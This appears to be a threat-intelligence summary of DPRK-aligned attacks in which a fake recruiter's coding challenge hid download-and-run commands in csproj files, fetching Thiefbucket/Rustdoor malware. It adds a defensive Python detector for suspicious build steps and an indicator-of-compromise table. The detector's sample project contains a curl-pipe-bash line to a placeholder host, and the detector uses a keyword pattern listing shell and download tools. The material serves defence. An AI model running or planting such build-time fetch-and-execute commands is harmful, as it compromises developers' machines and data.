Jamf Threat Labs Observes Targeted Attacks Amid FBI Warnings

2024-09-12 Jamf

https://www.jamf.com/blog/jamf-threat-labs-observes-targeted-attacks-amid-fbi-warnings/


Jamf observed DPRK-aligned social engineering against cryptocurrency and developer targets shortly after an FBI warning about North Korean targeting of the crypto sector. In the case described, a LinkedIn recruiter persona sent a zipped Visual Studio coding challenge that hid malicious bash commands inside two csproj files. Building the project ran curl to fetch two second-stage payloads of Thiefbucket (also known as Rustdoor) from taurihostmetrics.com; the samples communicated with wiresapplication.com and juchesoviet48.com. The payload configurations showed persistence through cron and .zshrc, and one Visual Studio-themed component could prompt the user for their password and steal the files named in its configuration.
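A defender-side check for the build-time execution described above, added here as an example and not Jamf's code or the actual sample: it parses a .csproj for MSBuild Exec tasks and pre/post-build events and flags commands that fetch or run scripts. The assumption that the commands were placed in Exec tasks or build events is mine (the post only says they were hidden in the csproj files); the sample project and its placeholder URL are constructed.

```python
"""Flag .csproj build steps that run downloaders or interpreters.
Constructed example; not Jamf's tooling or the real sample."""
import re
import xml.etree.ElementTree as ET

# Commands a build step has no business running on a developer machine.
# The lookbehind avoids matching inside paths such as "s.sh" or "/x.curl".
SUSPICIOUS = re.compile(
    r"(?<![\w./-])(curl|wget|bash|zsh|sh|python3?|osascript|base64|chmod)\b")


def find_build_commands(csproj_xml: str) -> list[tuple[str, str]]:
    """Return (location, command) for every shell command MSBuild would run."""
    root = ET.fromstring(csproj_xml)
    found = []
    for el in root.iter():
        tag = el.tag.split("}")[-1]  # strip the legacy MSBuild namespace
        if tag == "Target":
            for child in el.iter():
                if child.tag.split("}")[-1] == "Exec" and child.get("Command"):
                    found.append((f"Target:{el.get('Name')}", child.get("Command")))
        elif tag in ("PreBuildEvent", "PostBuildEvent") and (el.text or "").strip():
            found.append((tag, el.text.strip()))
    return found


def flag_suspicious(csproj_xml: str) -> list[tuple[str, str, list[str]]]:
    """Return (location, command, matched_tools) for build steps worth review."""
    hits = []
    for loc, cmd in find_build_commands(csproj_xml):
        matches = sorted(set(SUSPICIOUS.findall(cmd)))
        if matches:
            hits.append((loc, cmd, matches))
    return hits


# Constructed project: one benign Exec and one that pipes a download into bash.
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup><OutputType>Exe</OutputType></PropertyGroup>
  <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
    <Exec Command="curl -s https://placeholder.invalid/s.sh | bash" />
  </Target>
  <Target Name="Tidy"><Exec Command="rm -rf obj" /></Target>
</Project>"""

if __name__ == "__main__":
    for loc, cmd, tools in flag_suspicious(SAMPLE_CSPROJ):
        print(f"[{loc}] {tools}: {cmd}")
```

Run it over every csproj in a downloaded "coding challenge" before opening it in an IDE that builds on load.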

Indicators of Compromise

Type    Value                              First Seen   Last Seen
HASH    51a88646f9770e09b3505bd5cbadc58…   2024-09-12   2024-09-12
DOMAIN  juchesoviet48.com                  2024-09-12   2024-09-12
DOMAIN  taurihostmetrics.com               2024-09-12   2024-09-12
DOMAIN  wiresapplication.com               2024-09-12   2024-09-12